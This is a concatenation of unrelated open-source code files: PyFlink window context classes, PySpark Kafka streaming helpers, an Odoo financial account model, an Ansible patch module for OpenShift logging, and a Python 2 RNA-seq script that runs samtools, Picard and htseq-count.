if not finallink or ("sexuria.com/" in finallink):
self.log_error(_("Broken for link: %s") % link)
else:
linklist.append(finallink)
#: Log result
if not linklist:
self.fail(_("Unable to extract links (maybe plugin out of date?)"))
else:
for i, link in enumerate(linklist):
self.log_debug("Supported link %d/%d: %s" % (i+1, len(linklist), link))
#: All done, return to caller
return name, linklist, folder, password
|
yangdw/PyRepo | refs/heads/master | src/repo/extension-lib/__init__.py | 70 | # coding:utf-8
|
godfreyhe/flink | refs/heads/master | flink-python/pyflink/fn_execution/table/window_context.py | 9 | ################################################################################
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
################################################################################
import sys
from abc import ABC, abstractmethod
from typing import Generic, TypeVar, List, Iterable
from apache_beam.coders import Coder, PickleCoder
from pyflink.datastream.state import StateDescriptor, State, ValueStateDescriptor, \
ListStateDescriptor, MapStateDescriptor
from pyflink.datastream.timerservice import InternalTimerService
from pyflink.datastream.window import TimeWindow, CountWindow
from pyflink.fn_execution.timerservice_impl import InternalTimerServiceImpl
from pyflink.fn_execution.internal_state import InternalMergingState
from pyflink.fn_execution.state_impl import RemoteKeyedStateBackend
MAX_LONG_VALUE = sys.maxsize
K = TypeVar('K')
W = TypeVar('W', TimeWindow, CountWindow)
class Context(Generic[K, W], ABC):
"""
Information available in an invocation of methods of InternalWindowProcessFunction.
"""
@abstractmethod
def get_partitioned_state(self, state_descriptor: StateDescriptor) -> State:
"""
Creates a partitioned state handle, using the state backend configured for this task.
"""
pass
@abstractmethod
def current_key(self) -> K:
"""
Returns current key of current processed element.
"""
pass
@abstractmethod
def current_processing_time(self) -> int:
"""
Returns the current processing time.
"""
pass
@abstractmethod
def current_watermark(self) -> int:
"""
Returns the current event-time watermark.
"""
pass
@abstractmethod
def get_window_accumulators(self, window: W) -> List:
"""
Gets the accumulators of the given window.
"""
pass
@abstractmethod
def set_window_accumulators(self, window: W, acc: List):
"""
Sets the accumulators of the given window.
"""
pass
@abstractmethod
def clear_window_state(self, window: W):
"""
Clear window state of the given window.
"""
pass
@abstractmethod
def clear_trigger(self, window: W):
"""
Call Trigger#clear(Window) on trigger.
"""
pass
@abstractmethod
def on_merge(self, new_window: W, merged_windows: Iterable[W]):
"""
Call Trigger.on_merge() on trigger.
"""
pass
@abstractmethod
def delete_cleanup_timer(self, window: W):
"""
Deletes the cleanup timer set for the contents of the provided window.
"""
pass
class WindowContext(Context[K, W]):
"""
Context of window.
"""
def __init__(self,
window_operator,
trigger_context: 'TriggerContext',
state_backend: RemoteKeyedStateBackend,
state_value_coder: Coder,
timer_service: InternalTimerServiceImpl,
is_event_time: bool):
self._window_operator = window_operator
self._trigger_context = trigger_context
self._state_backend = state_backend
self.timer_service = timer_service
self.is_event_time = is_event_time
self.window_state = self._state_backend.get_value_state("window_state", state_value_coder)
def get_partitioned_state(self, state_descriptor: StateDescriptor) -> State:
return self._trigger_context.get_partitioned_state(state_descriptor)
def current_key(self) -> K:
return self._state_backend.get_current_key()
def current_processing_time(self) -> int:
return self.timer_service.current_processing_time()
def current_watermark(self) -> int:
return self.timer_service.current_watermark()
def get_window_accumulators(self, window: W) -> List:
self.window_state.set_current_namespace(window)
return self.window_state.value()
def set_window_accumulators(self, window: W, acc: List):
self.window_state.set_current_namespace(window)
self.window_state.update(acc)
def clear_window_state(self, window: W):
self.window_state.set_current_namespace(window)
self.window_state.clear()
def clear_trigger(self, window: W):
self._trigger_context.window = window
self._trigger_context.clear()
def on_merge(self, new_window: W, merged_windows: Iterable[W]):
self._trigger_context.window = new_window
self._trigger_context.merged_windows = merged_windows
self._trigger_context.on_merge()
def delete_cleanup_timer(self, window: W):
cleanup_time = self._window_operator.cleanup_time(window)
if cleanup_time == MAX_LONG_VALUE:
# no need to clean up because we didn't set one
return
if self.is_event_time:
self._trigger_context.delete_event_time_timer(cleanup_time)
else:
self._trigger_context.delete_processing_time_timer(cleanup_time)
class TriggerContext(object):
"""
TriggerContext is a utility for handling Trigger invocations. It can be reused by setting the
key and window fields. No internal state must be kept in the TriggerContext.
"""
def __init__(self,
trigger,
timer_service: InternalTimerService[W],
state_backend: RemoteKeyedStateBackend):
self._trigger = trigger
self._timer_service = timer_service
self._state_backend = state_backend
self.window = None # type: W
self.merged_windows = None # type: Iterable[W]
def open(self):
self._trigger.open(self)
def on_element(self, row, timestamp: int) -> bool:
return self._trigger.on_element(row, timestamp, self.window)
def on_processing_time(self, timestamp: int) -> bool:
return self._trigger.on_processing_time(timestamp, self.window)
def on_event_time(self, timestamp: int) -> bool:
return self._trigger.on_event_time(timestamp, self.window)
def on_merge(self):
self._trigger.on_merge(self.window, self)
def get_current_processing_time(self) -> int:
return self._timer_service.current_processing_time()
def get_current_watermark(self) -> int:
return self._timer_service.current_watermark()
def register_processing_time_timer(self, time: int):
self._timer_service.register_processing_time_timer(self.window, time)
def register_event_time_timer(self, time: int):
self._timer_service.register_event_time_timer(self.window, time)
def delete_processing_time_timer(self, time: int):
self._timer_service.delete_processing_time_timer(self.window, time)
def delete_event_time_timer(self, time: int):
self._timer_service.delete_event_time_timer(self.window, time)
def clear(self):
self._trigger.clear(self.window)
def get_partitioned_state(self, state_descriptor: StateDescriptor) -> State:
if isinstance(state_descriptor, ValueStateDescriptor):
state = self._state_backend.get_value_state(state_descriptor.name, PickleCoder())
elif isinstance(state_descriptor, ListStateDescriptor):
state = self._state_backend.get_list_state(state_descriptor.name, PickleCoder())
elif isinstance(state_descriptor, MapStateDescriptor):
state = self._state_backend.get_map_state(
state_descriptor.name, PickleCoder(), PickleCoder())
else:
raise Exception("Unknown supported StateDescriptor %s" % state_descriptor)
state.set_current_namespace(self.window)
return state
def merge_partitioned_state(self, state_descriptor: StateDescriptor):
        # merging namespaces only makes sense when there are windows to merge
        if self.merged_windows:
state = self.get_partitioned_state(state_descriptor)
if isinstance(state, InternalMergingState):
state.merge_namespaces(self.window, self.merged_windows)
else:
raise Exception("The given state descriptor does not refer to a mergeable state"
" (MergingState)")
|
dbergan/AutobahnPython | refs/heads/master | examples/twisted/wamp/basic/rpc/decorators/__init__.py | 561 | ###############################################################################
##
## Copyright (C) 2014 Tavendo GmbH
##
## Licensed under the Apache License, Version 2.0 (the "License");
## you may not use this file except in compliance with the License.
## You may obtain a copy of the License at
##
## http://www.apache.org/licenses/LICENSE-2.0
##
## Unless required by applicable law or agreed to in writing, software
## distributed under the License is distributed on an "AS IS" BASIS,
## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
## See the License for the specific language governing permissions and
## limitations under the License.
##
###############################################################################
|
poffuomo/spark | refs/heads/master | python/pyspark/streaming/kafka.py | 36 | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from py4j.protocol import Py4JJavaError
from pyspark.rdd import RDD
from pyspark.storagelevel import StorageLevel
from pyspark.serializers import AutoBatchedSerializer, PickleSerializer, PairDeserializer, \
NoOpSerializer
from pyspark.streaming import DStream
from pyspark.streaming.dstream import TransformedDStream
from pyspark.streaming.util import TransformFunction
__all__ = ['Broker', 'KafkaMessageAndMetadata', 'KafkaUtils', 'OffsetRange',
'TopicAndPartition', 'utf8_decoder']
def utf8_decoder(s):
""" Decode the unicode as UTF-8 """
if s is None:
return None
return s.decode('utf-8')
class KafkaUtils(object):
@staticmethod
def createStream(ssc, zkQuorum, groupId, topics, kafkaParams=None,
storageLevel=StorageLevel.MEMORY_AND_DISK_2,
keyDecoder=utf8_decoder, valueDecoder=utf8_decoder):
"""
Create an input stream that pulls messages from a Kafka Broker.
:param ssc: StreamingContext object
:param zkQuorum: Zookeeper quorum (hostname:port,hostname:port,..).
:param groupId: The group id for this consumer.
:param topics: Dict of (topic_name -> numPartitions) to consume.
Each partition is consumed in its own thread.
:param kafkaParams: Additional params for Kafka
:param storageLevel: RDD storage level.
:param keyDecoder: A function used to decode key (default is utf8_decoder)
:param valueDecoder: A function used to decode value (default is utf8_decoder)
:return: A DStream object
"""
if kafkaParams is None:
kafkaParams = dict()
kafkaParams.update({
"zookeeper.connect": zkQuorum,
"group.id": groupId,
"zookeeper.connection.timeout.ms": "10000",
})
if not isinstance(topics, dict):
raise TypeError("topics should be dict")
jlevel = ssc._sc._getJavaStorageLevel(storageLevel)
helper = KafkaUtils._get_helper(ssc._sc)
jstream = helper.createStream(ssc._jssc, kafkaParams, topics, jlevel)
ser = PairDeserializer(NoOpSerializer(), NoOpSerializer())
stream = DStream(jstream, ssc, ser)
return stream.map(lambda k_v: (keyDecoder(k_v[0]), valueDecoder(k_v[1])))
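    # Usage sketch (hypothetical hosts/topics, for illustration only):
    #
    #   ssc = StreamingContext(sc, 2)
    #   stream = KafkaUtils.createStream(
    #       ssc, "zkhost:2181", "my-group", {"my-topic": 1})
    #   stream.map(lambda kv: kv[1]).pprint()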
@staticmethod
def createDirectStream(ssc, topics, kafkaParams, fromOffsets=None,
keyDecoder=utf8_decoder, valueDecoder=utf8_decoder,
messageHandler=None):
"""
        .. note:: Experimental

        Create an input stream that directly pulls messages from Kafka brokers
        at specific offsets. This is not a receiver-based Kafka input stream:
        it pulls messages from Kafka in each batch duration and processes them
        without storing them.
This does not use Zookeeper to store offsets. The consumed offsets are tracked
by the stream itself. For interoperability with Kafka monitoring tools that depend on
Zookeeper, you have to update Kafka/Zookeeper yourself from the streaming application.
        You can access the offsets used in each batch from the generated RDDs
        (see ``KafkaRDD.offsetRanges()``).
        To recover from driver failures, you have to enable checkpointing in
        the StreamingContext. The information on consumed offsets can be
        recovered from the checkpoint.
See the programming guide for details (constraints, etc.).
:param ssc: StreamingContext object.
:param topics: list of topic_name to consume.
:param kafkaParams: Additional params for Kafka.
:param fromOffsets: Per-topic/partition Kafka offsets defining the (inclusive) starting
point of the stream.
:param keyDecoder: A function used to decode key (default is utf8_decoder).
:param valueDecoder: A function used to decode value (default is utf8_decoder).
        :param messageHandler: A function used to convert KafkaMessageAndMetadata.
               You can access message metadata through messageHandler (default is None).
:return: A DStream object
"""
if fromOffsets is None:
fromOffsets = dict()
if not isinstance(topics, list):
raise TypeError("topics should be list")
if not isinstance(kafkaParams, dict):
raise TypeError("kafkaParams should be dict")
def funcWithoutMessageHandler(k_v):
return (keyDecoder(k_v[0]), valueDecoder(k_v[1]))
def funcWithMessageHandler(m):
m._set_key_decoder(keyDecoder)
m._set_value_decoder(valueDecoder)
return messageHandler(m)
helper = KafkaUtils._get_helper(ssc._sc)
jfromOffsets = dict([(k._jTopicAndPartition(helper),
v) for (k, v) in fromOffsets.items()])
if messageHandler is None:
ser = PairDeserializer(NoOpSerializer(), NoOpSerializer())
func = funcWithoutMessageHandler
jstream = helper.createDirectStreamWithoutMessageHandler(
ssc._jssc, kafkaParams, set(topics), jfromOffsets)
else:
ser = AutoBatchedSerializer(PickleSerializer())
func = funcWithMessageHandler
jstream = helper.createDirectStreamWithMessageHandler(
ssc._jssc, kafkaParams, set(topics), jfromOffsets)
stream = DStream(jstream, ssc, ser).map(func)
return KafkaDStream(stream._jdstream, ssc, stream._jrdd_deserializer)
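    # Usage sketch (hypothetical brokers/offsets): resuming a direct stream
    # from stored offsets via TopicAndPartition, for illustration only.
    #
    #   fromOffsets = {TopicAndPartition("my-topic", 0): 1000}
    #   stream = KafkaUtils.createDirectStream(
    #       ssc, ["my-topic"], {"metadata.broker.list": "broker:9092"},
    #       fromOffsets=fromOffsets)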
@staticmethod
def createRDD(sc, kafkaParams, offsetRanges, leaders=None,
keyDecoder=utf8_decoder, valueDecoder=utf8_decoder,
messageHandler=None):
"""
.. note:: Experimental
Create an RDD from Kafka using offset ranges for each topic and partition.
:param sc: SparkContext object
:param kafkaParams: Additional params for Kafka
:param offsetRanges: list of offsetRange to specify topic:partition:[start, end) to consume
:param leaders: Kafka brokers for each TopicAndPartition in offsetRanges. May be an empty
map, in which case leaders will be looked up on the driver.
:param keyDecoder: A function used to decode key (default is utf8_decoder)
:param valueDecoder: A function used to decode value (default is utf8_decoder)
        :param messageHandler: A function used to convert KafkaMessageAndMetadata.
               You can access message metadata through messageHandler (default is None).
:return: An RDD object
"""
if leaders is None:
leaders = dict()
if not isinstance(kafkaParams, dict):
raise TypeError("kafkaParams should be dict")
if not isinstance(offsetRanges, list):
raise TypeError("offsetRanges should be list")
def funcWithoutMessageHandler(k_v):
return (keyDecoder(k_v[0]), valueDecoder(k_v[1]))
def funcWithMessageHandler(m):
m._set_key_decoder(keyDecoder)
m._set_value_decoder(valueDecoder)
return messageHandler(m)
helper = KafkaUtils._get_helper(sc)
joffsetRanges = [o._jOffsetRange(helper) for o in offsetRanges]
jleaders = dict([(k._jTopicAndPartition(helper),
v._jBroker(helper)) for (k, v) in leaders.items()])
if messageHandler is None:
jrdd = helper.createRDDWithoutMessageHandler(
sc._jsc, kafkaParams, joffsetRanges, jleaders)
ser = PairDeserializer(NoOpSerializer(), NoOpSerializer())
rdd = RDD(jrdd, sc, ser).map(funcWithoutMessageHandler)
else:
jrdd = helper.createRDDWithMessageHandler(
sc._jsc, kafkaParams, joffsetRanges, jleaders)
rdd = RDD(jrdd, sc).map(funcWithMessageHandler)
return KafkaRDD(rdd._jrdd, sc, rdd._jrdd_deserializer)
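    # Usage sketch (hypothetical values): reading a bounded slice of a topic
    # as a batch RDD, for illustration only.
    #
    #   ranges = [OffsetRange("my-topic", 0, fromOffset=0, untilOffset=100)]
    #   rdd = KafkaUtils.createRDD(
    #       sc, {"metadata.broker.list": "broker:9092"}, ranges)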
@staticmethod
def _get_helper(sc):
try:
return sc._jvm.org.apache.spark.streaming.kafka.KafkaUtilsPythonHelper()
except TypeError as e:
if str(e) == "'JavaPackage' object is not callable":
KafkaUtils._printErrorMsg(sc)
raise
@staticmethod
def _printErrorMsg(sc):
print("""
________________________________________________________________________________________________
Spark Streaming's Kafka libraries not found in class path. Try one of the following.
1. Include the Kafka library and its dependencies with in the
spark-submit command as
$ bin/spark-submit --packages org.apache.spark:spark-streaming-kafka-0-8:%s ...
2. Download the JAR of the artifact from Maven Central http://search.maven.org/,
Group Id = org.apache.spark, Artifact Id = spark-streaming-kafka-0-8-assembly, Version = %s.
Then, include the jar in the spark-submit command as
$ bin/spark-submit --jars <spark-streaming-kafka-0-8-assembly.jar> ...
________________________________________________________________________________________________
""" % (sc.version, sc.version))
class OffsetRange(object):
"""
Represents a range of offsets from a single Kafka TopicAndPartition.
"""
def __init__(self, topic, partition, fromOffset, untilOffset):
"""
Create an OffsetRange to represent range of offsets
:param topic: Kafka topic name.
:param partition: Kafka partition id.
:param fromOffset: Inclusive starting offset.
:param untilOffset: Exclusive ending offset.
"""
self.topic = topic
self.partition = partition
self.fromOffset = fromOffset
self.untilOffset = untilOffset
def __eq__(self, other):
if isinstance(other, self.__class__):
return (self.topic == other.topic
and self.partition == other.partition
and self.fromOffset == other.fromOffset
and self.untilOffset == other.untilOffset)
else:
return False
def __ne__(self, other):
return not self.__eq__(other)
def __str__(self):
return "OffsetRange(topic: %s, partition: %d, range: [%d -> %d]" \
% (self.topic, self.partition, self.fromOffset, self.untilOffset)
def _jOffsetRange(self, helper):
return helper.createOffsetRange(self.topic, self.partition, self.fromOffset,
self.untilOffset)
class TopicAndPartition(object):
"""
Represents a specific topic and partition for Kafka.
"""
def __init__(self, topic, partition):
"""
Create a Python TopicAndPartition to map to the Java related object
:param topic: Kafka topic name.
:param partition: Kafka partition id.
"""
self._topic = topic
self._partition = partition
def _jTopicAndPartition(self, helper):
return helper.createTopicAndPartition(self._topic, self._partition)
def __eq__(self, other):
if isinstance(other, self.__class__):
return (self._topic == other._topic
and self._partition == other._partition)
else:
return False
def __ne__(self, other):
return not self.__eq__(other)
def __hash__(self):
return (self._topic, self._partition).__hash__()
class Broker(object):
"""
Represent the host and port info for a Kafka broker.
"""
def __init__(self, host, port):
"""
Create a Python Broker to map to the Java related object.
:param host: Broker's hostname.
:param port: Broker's port.
"""
self._host = host
self._port = port
def _jBroker(self, helper):
return helper.createBroker(self._host, self._port)
class KafkaRDD(RDD):
"""
A Python wrapper of KafkaRDD, to provide additional information on normal RDD.
"""
def __init__(self, jrdd, ctx, jrdd_deserializer):
RDD.__init__(self, jrdd, ctx, jrdd_deserializer)
def offsetRanges(self):
"""
Get the OffsetRange of specific KafkaRDD.
:return: A list of OffsetRange
"""
helper = KafkaUtils._get_helper(self.ctx)
joffsetRanges = helper.offsetRangesOfKafkaRDD(self._jrdd.rdd())
ranges = [OffsetRange(o.topic(), o.partition(), o.fromOffset(), o.untilOffset())
for o in joffsetRanges]
return ranges
class KafkaDStream(DStream):
"""
A Python wrapper of KafkaDStream
"""
def __init__(self, jdstream, ssc, jrdd_deserializer):
DStream.__init__(self, jdstream, ssc, jrdd_deserializer)
def foreachRDD(self, func):
"""
Apply a function to each RDD in this DStream.
"""
if func.__code__.co_argcount == 1:
old_func = func
func = lambda r, rdd: old_func(rdd)
jfunc = TransformFunction(self._sc, func, self._jrdd_deserializer) \
.rdd_wrapper(lambda jrdd, ctx, ser: KafkaRDD(jrdd, ctx, ser))
api = self._ssc._jvm.PythonDStream
api.callForeachRDD(self._jdstream, jfunc)
def transform(self, func):
"""
Return a new DStream in which each RDD is generated by applying a function
on each RDD of this DStream.
`func` can have one argument of `rdd`, or have two arguments of
(`time`, `rdd`)
"""
if func.__code__.co_argcount == 1:
oldfunc = func
func = lambda t, rdd: oldfunc(rdd)
assert func.__code__.co_argcount == 2, "func should take one or two arguments"
return KafkaTransformedDStream(self, func)
class KafkaTransformedDStream(TransformedDStream):
"""
Kafka specific wrapper of TransformedDStream to transform on Kafka RDD.
"""
def __init__(self, prev, func):
TransformedDStream.__init__(self, prev, func)
@property
def _jdstream(self):
if self._jdstream_val is not None:
return self._jdstream_val
jfunc = TransformFunction(self._sc, self.func, self.prev._jrdd_deserializer) \
.rdd_wrapper(lambda jrdd, ctx, ser: KafkaRDD(jrdd, ctx, ser))
dstream = self._sc._jvm.PythonTransformedDStream(self.prev._jdstream.dstream(), jfunc)
self._jdstream_val = dstream.asJavaDStream()
return self._jdstream_val
class KafkaMessageAndMetadata(object):
"""
Kafka message and metadata information. Including topic, partition, offset and message
"""
def __init__(self, topic, partition, offset, key, message):
"""
Python wrapper of Kafka MessageAndMetadata
:param topic: topic name of this Kafka message
:param partition: partition id of this Kafka message
:param offset: Offset of this Kafka message in the specific partition
        :param key: key payload of this Kafka message; can be None if this Kafka
                    message has no key specified. The returned data is an
                    undecoded bytearray.
        :param message: actual message payload of this Kafka message. The
                        returned data is an undecoded bytearray.
"""
self.topic = topic
self.partition = partition
self.offset = offset
self._rawKey = key
self._rawMessage = message
self._keyDecoder = utf8_decoder
self._valueDecoder = utf8_decoder
def __str__(self):
return "KafkaMessageAndMetadata(topic: %s, partition: %d, offset: %d, key and message...)" \
% (self.topic, self.partition, self.offset)
def __repr__(self):
return self.__str__()
def __reduce__(self):
return (KafkaMessageAndMetadata,
(self.topic, self.partition, self.offset, self._rawKey, self._rawMessage))
def _set_key_decoder(self, decoder):
self._keyDecoder = decoder
def _set_value_decoder(self, decoder):
self._valueDecoder = decoder
@property
def key(self):
return self._keyDecoder(self._rawKey)
@property
def message(self):
return self._valueDecoder(self._rawMessage)
|
thinkopensolutions/l10n-brazil | refs/heads/10.0 | financial/models/financial_account.py | 2 | # -*- coding: utf-8 -*-
#
# Copyright 2017 KMEE INFORMATICA LTDA
# Aristides Caldeira <aristides.caldeira@kmee.com.br>
# License AGPL-3 or later (http://www.gnu.org/licenses/agpl)
#
from __future__ import division, print_function, unicode_literals
from odoo import api, fields, models
class FinancialAccount(models.Model):
_name = b'financial.account'
_description = 'Financial Account'
_parent_name = 'parent_id'
# _parent_store = True
# _parent_order = 'code, name'
_rec_name = 'complete_name'
_order = 'code, complete_name'
code = fields.Char(
string='Code',
size=20,
index=True,
required=True,
)
name = fields.Char(
string='Name',
size=60,
index=True,
required=True,
)
parent_id = fields.Many2one(
comodel_name='financial.account',
string='Parent account',
ondelete='restrict',
index=True,
)
parent_left = fields.Integer(
string='Left Parent',
index=True,
)
parent_right = fields.Integer(
string='Right Parent',
index=True,
)
child_ids = fields.One2many(
comodel_name='financial.account',
inverse_name='parent_id',
string='Child Accounts',
)
level = fields.Integer(
string='Level',
compute='_compute_account',
store=True,
index=True,
)
is_reduction = fields.Boolean(
string='Is reduction account?',
compute='_compute_account',
store=True,
)
sign = fields.Integer(
string='Sign',
compute='_compute_account',
store=True,
)
complete_name = fields.Char(
string='Account',
size=500,
compute='_compute_account',
store=True,
)
type = fields.Selection(
selection=[
('A', 'Analytic'),
('S', 'Sinthetic')
],
string='Type',
compute='_compute_account',
store=True,
index=True,
)
def _compute_level(self):
self.ensure_one()
level = 1
if self.parent_id:
level += self.parent_id._compute_level()
return level
def _compute_complete_name(self):
self.ensure_one()
name = self.name
if self.parent_id:
name = self.parent_id._compute_complete_name() + ' / ' + name
return name
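    # Illustrative result (hypothetical records): for an account coded "1.1"
    # named "Receivables" whose parent is "Assets", the two helpers above
    # combine into:
    #   complete_name = "1.1 - Assets / Receivables"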
@api.depends('parent_id', 'code', 'name', 'child_ids.parent_id')
def _compute_account(self):
for account in self:
account.level = account._compute_level()
            if account.name and \
                    (account.name.startswith('(-)') or
                     account.name.startswith('( - )')):
account.is_reduction = True
account.sign = -1
else:
account.is_reduction = False
account.sign = 1
if len(account.child_ids) > 0:
account.type = 'S'
else:
account.type = 'A'
if account.code and account.name:
account.complete_name = account.code + ' - ' + \
account._compute_complete_name()
def recreate_financial_account_tree_analysis(self):
# from .financial_account_tree_analysis import \
# SQL_SELECT_ACCOUNT_TREE_ANALYSIS
SQL_RECREATE_FINANCIAL_ACCOUNT_TREE_ANALYSIS = '''
delete from financial_account_tree_analysis;
insert into financial_account_tree_analysis (id, child_account_id,
parent_account_id, level)
select row_number() over()
as id, child_account_id, parent_account_id, level
from financial_account_tree_analysis_view
order by child_account_id, parent_account_id;
'''
self.env.cr.execute(SQL_RECREATE_FINANCIAL_ACCOUNT_TREE_ANALYSIS)
@api.model
def create(self, vals):
res = super(FinancialAccount, self).create(vals)
self.recreate_financial_account_tree_analysis()
return res
@api.multi
def write(self, vals):
res = super(FinancialAccount, self).write(vals)
self.recreate_financial_account_tree_analysis()
return res
@api.multi
def unlink(self):
res = super(FinancialAccount, self).unlink()
self.recreate_financial_account_tree_analysis()
return res
|
blrm/openshift-tools | refs/heads/stg | openshift/installer/vendored/openshift-ansible-3.10.0-0.29.0/roles/openshift_logging/library/logging_patch.py | 40 | #!/usr/bin/python
""" Ansible module to help with creating context patch file with whitelisting for logging """
import difflib
import re
from ansible.module_utils.basic import AnsibleModule
DOCUMENTATION = '''
---
module: logging_patch
short_description: This will create a context patch file while giving the
    ability to whitelist some lines (excluding them from comparison)
description:
- "To create configmap patches for logging"
author:
- Eric Wolinetz ewolinet@redhat.com
'''
EXAMPLES = '''
- logging_patch:
original_file: "{{ tempdir }}/current.yml"
new_file: "{{ configmap_new_file }}"
whitelist: "{{ configmap_protected_lines | default([]) }}"
'''
def account_for_whitelist(current_file_contents, new_file_contents, white_list=None):
""" This method will remove lines that contain whitelist values from the content
of the file so that we aren't build a patch based on that line
Usage:
for current_file_contents:
index:
number_of_shards: 1
number_of_replicas: 0
unassigned.node_left.delayed_timeout: 2m
translog:
flush_threshold_size: 256mb
flush_threshold_period: 5m
and new_file_contents:
index:
number_of_shards: 2
number_of_replicas: 1
unassigned.node_left.delayed_timeout: 2m
translog:
flush_threshold_size: 256mb
flush_threshold_period: 5m
and white_list:
['number_of_shards', 'number_of_replicas']
We would end up with:
index:
number_of_shards: 2
number_of_replicas: 1
unassigned.node_left.delayed_timeout: 2m
translog:
flush_threshold_size: 256mb
flush_threshold_period: 5m
"""
    white_list = white_list or []  # guard: the signature default is None
    for line in white_list:
regex_line = r".*" + re.escape(line) + r":.*\n"
new_file_line = re.search(regex_line, new_file_contents)
if new_file_line:
current_file_contents = re.sub(regex_line, new_file_line.group(0), current_file_contents)
else:
current_file_contents = re.sub(regex_line, "", current_file_contents)
return current_file_contents
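# Doctest-style sketch (illustrative strings only) of the substitution above:
#
#   >>> cur = "shards: 1\nflush: 5m\n"
#   >>> new = "shards: 2\nflush: 5m\n"
#   >>> account_for_whitelist(cur, new, ['shards'])
#   'shards: 2\nflush: 5m\n'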
def run_module():
""" The body of the module, we check if the variable name specified as the value
for the key is defined. If it is then we use that value as for the original key """
module = AnsibleModule(
argument_spec=dict(
original_file=dict(type='str', required=True),
new_file=dict(type='str', required=True),
whitelist=dict(required=False, type='list', default=[])
),
supports_check_mode=True
)
original_fh = open(module.params['original_file'], "r")
original_contents = original_fh.read()
original_fh.close()
new_fh = open(module.params['new_file'], "r")
new_contents = new_fh.read()
new_fh.close()
original_contents = account_for_whitelist(original_contents, new_contents, module.params['whitelist'])
uni_diff = difflib.unified_diff(new_contents.splitlines(),
original_contents.splitlines(),
lineterm='')
return module.exit_json(changed=False, # noqa: F405
raw_patch="\n".join(uni_diff))
def main():
""" main """
run_module()
if __name__ == '__main__':
main()
|
idbedead/RNA-sequence-tools | refs/heads/master | Count_Parsing/sort_htseq_count.py | 2 | import fnmatch
import os
import pandas as pd
import cPickle as pickle
import subprocess
import csv
'''This program takes accepted_hits.bam files from TopHat, turns them into
counts, and builds a matrix of cells/conditions by counts using htseq:
http://www-huber.embl.de/HTSeq/doc/overview.html
The files are sorted using samtools: http://www.htslib.org/
Paired-end mates are fixed and RNA metrics are collected using Picard tools:
http://broadinstitute.github.io/picard/
The 3' to 5' bias of each sample is collected as a matrix file for easy plotting.
'''
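#Illustrative shell commands built below for a hypothetical sample 'cellA':
# samtools sort <root>/accepted_hits.bam <root>/cellA_sorted
# java -jar picard.jar FixMateInformation INPUT=cellA_sorted.bam OUTPUT=cellA_sorted_FM.bam ...
# htseq-count -f bam cellA_sorted_FM.bam genes_E_RS.gtf > cellA_htseqcount.txt
# java -jar picard.jar CollectRnaSeqMetrics REF_FLAT=... INPUT=cellA_sorted_FM.bam OUTPUT=cellA_RNA_metric.txt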
#list of file paths with mapped hits
pats = ['/Volumes/Seq_data/results_01272015', '/Volumes/Seq_data/results_spc2_n2']
#output path
path = '/Volumes/Seq_data'
#initialize dictionaries for collected output
fpkm_matrix_dict_g ={}
count_dict = {}
norm_read_dict = {}
picard_stats_dict = {}
#collect gene_list once since it is the same across all samples
st = 1
gene_list = []
#loop through all files and sort, fix, count, collect metrics on each
for p in pats:
for root, dirnames, filenames in os.walk(p):
for filename in fnmatch.filter(filenames, 'accepted_hits.bam'):
#sort accepted_hits.bam using samtools
cname = root.split('/')[-1]
sort_out = os.path.join(root,cname+'_sorted')
sam_sort_calln = 'samtools sort -n '+os.path.join(root,filename)+' '+sort_out
sam_sort_call = 'samtools sort '+os.path.join(root,filename)+' '+sort_out
print sam_sort_call
#skip if file already exists
if not os.path.isfile(sort_out+'.bam'):
process = subprocess.Popen(sam_sort_call, stdout=subprocess.PIPE, shell=True)
out, err = process.communicate()
print(out)
else:
print sort_out+'.bam already exists'
pass
#run picard_fixmate to clean up paired end reads in accepted_hits.bam (sorted)
picard_fixmate_out = os.path.join(root,sort_out.strip('.bam')+'_FM.bam')
if not os.path.isfile(picard_fixmate_out):
picard_fixmate_call = 'java -Xmx3g -jar /Users/idriver/picard/dist/picard.jar FixMateInformation INPUT='+sort_out+'.bam OUTPUT='+picard_fixmate_out+' AS=true SORT_ORDER=coordinate'
print picard_fixmate_call
process = subprocess.Popen(picard_fixmate_call, stdout=subprocess.PIPE, shell=True)
out, err = process.communicate()
print(out)
else:
print picard_fixmate_out+' already exists'
#format htseq-count command to generate raw counts from sorted accepted hits
gf = '/Volumes/Seq_data/genes_E_RS.gtf'
hts_out = os.path.join(root,cname+'_htseqcount.txt')
htseq_count_call = 'htseq-count -f bam '+picard_fixmate_out+' '+gf+' > '+hts_out
print htseq_count_call
if not os.path.isfile(hts_out):
process = subprocess.Popen(htseq_count_call, stdout=subprocess.PIPE, shell=True)
out, err = process.communicate()
print(out)
else:
print('htseq-count already exists')
#run picard CollectRnaSeqMetrics (http://broadinstitute.github.io/picard/command-line-overview.html) and generate matrix of 3' to 5' bias (norm_read_dict)
picard_rnaseqmetric_out = os.path.join(root,sort_out.strip('sorted.bam')+'RNA_metric.txt')
picard_rnaseqchart_out = os.path.join(root,sort_out.strip('sorted.bam')+'RNA_metric.pdf')
picard_seqmetric_call = 'java -Xmx3g -jar /Users/idriver/picard/dist/picard.jar CollectRnaSeqMetrics REF_FLAT=/Volumes/Seq_data/refFlat_mm10ERS.txt.gz STRAND_SPECIFICITY=NONE MINIMUM_LENGTH=70 CHART_OUTPUT='+picard_rnaseqchart_out+' INPUT='+picard_fixmate_out+' OUTPUT='+picard_rnaseqmetric_out
print picard_seqmetric_call
if not os.path.isfile(picard_rnaseqchart_out):
process = subprocess.Popen(picard_seqmetric_call, stdout=subprocess.PIPE, shell=True)
out, err = process.communicate()
